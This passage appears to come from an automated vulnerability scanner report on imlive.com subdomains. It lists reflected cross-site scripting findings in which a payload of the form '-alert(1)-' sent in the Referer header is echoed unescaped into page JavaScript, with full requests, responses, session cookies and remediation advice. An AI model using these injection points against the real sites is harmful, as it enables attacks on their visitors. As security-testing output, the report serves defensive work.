Set-Cookie: ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:04 GMT
Connection: close
Content-Length: 20745
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/login.aspx&he=br.imlive.com&ul=/webcam-login/&rf=http://www.google.com/search?hl=en^q=6a328'-alert(1)-'eadcfd684a2&iy=dallas&id=44&iu=1&vd=c9a4e47e-04fb-49d0-a02e-72013ee5baf4';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

2.176. http://cafr.imlive.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cafr.imlive.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97e0d'-alert(1)-'85ef759ec87 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=97e0d'-alert(1)-'85ef759ec87

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=abjerb55miue1jybuviox355; path=/; HttpOnly
Set-Cookie: pcafr=; expires=Thu, 27-Jan-2011 14:16:56 GMT; path=/
Set-Cookie: ASP.NET_SessionId=abjerb55miue1jybuviox355; path=/; HttpOnly
Set-Cookie: pcafr=; expires=Thu, 27-Jan-2011 14:16:56 GMT; path=/
Set-Cookie: spvdr=vd=b251e2ee-c181-407f-9403-d9aeab43a548&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:56 GMT; path=/
Set-Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:16:55 GMT
Connection: close
Content-Length: 18800
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-CA" lang="fr-CA" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=cafr.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=97e0d'-alert(1)-'85ef759ec87&iy=dallas&id=44&iu=1&vd=b251e2ee-c181-407f-9403-d9aeab43a548';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

2.177. http://cafr.imlive.com/waccess/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cafr.imlive.com
Path:   /waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9536b'-alert(1)-'e58569d4bd5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /waccess/ HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=9536b'-alert(1)-'e58569d4bd5

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=jrzbde55yhvkm0yd0wajeo55; path=/; HttpOnly
Set-Cookie: pcafr=; expires=Thu, 27-Jan-2011 14:17:03 GMT; path=/
Set-Cookie: ASP.NET_SessionId=jrzbde55yhvkm0yd0wajeo55; path=/; HttpOnly
Set-Cookie: pcafr=; expires=Thu, 27-Jan-2011 14:17:03 GMT; path=/
Set-Cookie: spvdr=vd=6a0168f5-b4e1-4005-82b3-4d8109481900&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:03 GMT; path=/
Set-Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:03 GMT
Connection: close
Content-Length: 220503
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-CA" lang="fr-CA" d
...[SNIP]...
text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/hostlist.ashx&he=cafr.imlive.com&ul=/live-sex-chats/cam-girls/&rf=http://www.google.com/search?hl=en^q=9536b'-alert(1)-'e58569d4bd5&qs=cat=1^roomid=10&qs=cat=1^roomid=10&iy=dallas&id=44&iu=1&vd=6a0168f5-b4e1-4005-82b3-4d8109481900';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attac
...[SNIP]...

2.178. http://de.imlive.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://de.imlive.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6236'-alert(1)-'6b063b5f82a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=e6236'-alert(1)-'6b063b5f82a

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=wmkuv23dire3y5455dflznbk; path=/; HttpOnly
Set-Cookie: pde=; expires=Thu, 27-Jan-2011 14:17:00 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=wmkuv23dire3y5455dflznbk; path=/; HttpOnly
Set-Cookie: pde=; expires=Thu, 27-Jan-2011 14:17:00 GMT; path=/
Set-Cookie: spvdr=vd=4e0a90f8-4f17-4e29-82a0-f518b35446a3&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:00 GMT; path=/
Set-Cookie: ide=d1L8nYGrPxxKfmvRaNCT6s6MpjdKe%2bsvHgUcdJmSzWWUOCRgxkUhM1pMfPg4ve7KJ4HmML4ZGtxedHgz3z0VeDDHT7ms46J7zdPnECvs0RqcP8Em5lcLL9tsXaD3uSCr; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:00 GMT
Connection: close
Content-Length: 18350
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-DE" lang="de-DE" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=de.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=e6236'-alert(1)-'6b063b5f82a&iu=1&vd=4e0a90f8-4f17-4e29-82a0-f518b35446a3';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typeof obj.addEvent
...[SNIP]...

2.179. http://de.imlive.com/waccess/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://de.imlive.com
Path:   /waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e45d9'-alert(1)-'4b50bf8581f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /waccess/ HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=e45d9'-alert(1)-'4b50bf8581f

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=go54xq451damzdiseidhmr55; path=/; HttpOnly
Set-Cookie: pde=; expires=Thu, 27-Jan-2011 14:17:05 GMT; path=/
Set-Cookie: ASP.NET_SessionId=go54xq451damzdiseidhmr55; path=/; HttpOnly
Set-Cookie: pde=; expires=Thu, 27-Jan-2011 14:17:05 GMT; path=/
Set-Cookie: spvdr=vd=07626285-c0ff-437f-958c-dcbbd088dd7f&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:05 GMT; path=/
Set-Cookie: ide=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:05 GMT
Connection: close
Content-Length: 169257
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-DE" lang="de-DE" d
...[SNIP]...
="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/hostlist.ashx&he=de.imlive.com&ul=/live-sex-chats/cam-girls/&rf=http://www.google.com/search?hl=en^q=e45d9'-alert(1)-'4b50bf8581f&qs=cat=1^roomid=10&qs=cat=1^roomid=10&iy=dallas&id=44&iu=1&vd=07626285-c0ff-437f-958c-dcbbd088dd7f';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attac
...[SNIP]...

2.180. http://dk.imlive.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://dk.imlive.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c15d'-alert(1)-'545d614c845 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: dk.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=8c15d'-alert(1)-'545d614c845

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=mw4rtt55tfb3b345unpsg3bl; path=/; HttpOnly
Set-Cookie: pdk=; expires=Thu, 27-Jan-2011 14:17:09 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=mw4rtt55tfb3b345unpsg3bl; path=/; HttpOnly
Set-Cookie: pdk=; expires=Thu, 27-Jan-2011 14:17:09 GMT; path=/
Set-Cookie: spvdr=vd=6f35da7a-dc76-47e3-98a4-e43628726799&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:09 GMT; path=/
Set-Cookie: idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:08 GMT
Connection: close
Content-Length: 17947
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="da-DK" lang="da-DK" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=dk.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=8c15d'-alert(1)-'545d614c845&iy=dallas&id=44&iu=1&vd=6f35da7a-dc76-47e3-98a4-e43628726799';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

2.181. http://dk.imlive.com/waccess/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://dk.imlive.com
Path:   /waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58ec0'-alert(1)-'1ca19f61f52 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /waccess/ HTTP/1.1
Host: dk.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=58ec0'-alert(1)-'1ca19f61f52

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=3art1xq5rk2h0l45whar1iir; path=/; HttpOnly
Set-Cookie: pdk=; expires=Thu, 27-Jan-2011 14:17:14 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=3art1xq5rk2h0l45whar1iir; path=/; HttpOnly
Set-Cookie: pdk=; expires=Thu, 27-Jan-2011 14:17:14 GMT; path=/
Set-Cookie: spvdr=vd=76cd456c-f3e0-433a-8774-56766a677704&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:14 GMT; path=/
Set-Cookie: idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:13 GMT
Connection: close
Content-Length: 220246
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="da-DK" lang="da-DK" d
...[SNIP]...
="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/hostlist.ashx&he=dk.imlive.com&ul=/live-sex-chats/cam-girls/&rf=http://www.google.com/search?hl=en^q=58ec0'-alert(1)-'1ca19f61f52&qs=cat=1^roomid=10&qs=cat=1^roomid=10&iy=dallas&id=44&iu=1&vd=76cd456c-f3e0-433a-8774-56766a677704';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attac
...[SNIP]...

2.182. http://es.imlive.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://es.imlive.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ef76'-alert(1)-'7097e4ccd25 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=6ef76'-alert(1)-'7097e4ccd25

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=zuzkb455ihqfoc55yv0wku45; path=/; HttpOnly
Set-Cookie: pes=; expires=Thu, 27-Jan-2011 14:17:11 GMT; path=/
Set-Cookie: ASP.NET_SessionId=zuzkb455ihqfoc55yv0wku45; path=/; HttpOnly
Set-Cookie: pes=; expires=Thu, 27-Jan-2011 14:17:11 GMT; path=/
Set-Cookie: spvdr=vd=2550678d-c9a3-476d-862b-ab4b8888cd75&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:11 GMT; path=/
Set-Cookie: ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:10 GMT
Connection: close
Content-Length: 18390
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-ES" lang="es-ES" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=es.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=6ef76'-alert(1)-'7097e4ccd25&iy=dallas&id=44&iu=1&vd=2550678d-c9a3-476d-862b-ab4b8888cd75';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

2.183. http://es.imlive.com/waccess/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://es.imlive.com
Path:   /waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 751a4'-alert(1)-'3e6a4981811 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /waccess/ HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=751a4'-alert(1)-'3e6a4981811

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ly2txpzezmcm5155sslifc45; path=/; HttpOnly
Set-Cookie: pes=; expires=Thu, 27-Jan-2011 14:17:19 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ly2txpzezmcm5155sslifc45; path=/; HttpOnly
Set-Cookie: pes=; expires=Thu, 27-Jan-2011 14:17:19 GMT; path=/
Set-Cookie: spvdr=vd=ff1efd09-20e4-4d52-8133-071e0b292933&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:19 GMT; path=/
Set-Cookie: ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:18 GMT
Connection: close
Content-Length: 211707
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-ES" lang="es-ES" d
...[SNIP]...
="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/hostlist.ashx&he=es.imlive.com&ul=/live-sex-chats/cam-girls/&rf=http://www.google.com/search?hl=en^q=751a4'-alert(1)-'3e6a4981811&qs=cat=1^roomid=10&qs=cat=1^roomid=10&iy=dallas&id=44&iu=1&vd=ff1efd09-20e4-4d52-8133-071e0b292933';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attac
...[SNIP]...

2.184. http://fr.imlive.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://fr.imlive.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8655a'-alert(1)-'b1450d4e902 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: fr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=8655a'-alert(1)-'b1450d4e902

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=n3rd2q45ehprj445d1b53wnr; path=/; HttpOnly
Set-Cookie: pfr=; expires=Thu, 27-Jan-2011 14:17:20 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=n3rd2q45ehprj445d1b53wnr; path=/; HttpOnly
Set-Cookie: pfr=; expires=Thu, 27-Jan-2011 14:17:20 GMT; path=/
Set-Cookie: spvdr=vd=66658cff-7513-44e5-b0ab-43cb696f464f&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:20 GMT; path=/
Set-Cookie: ifr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:20 GMT
Connection: close
Content-Length: 18603
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-FR" lang="fr-FR" d
...[SNIP]...
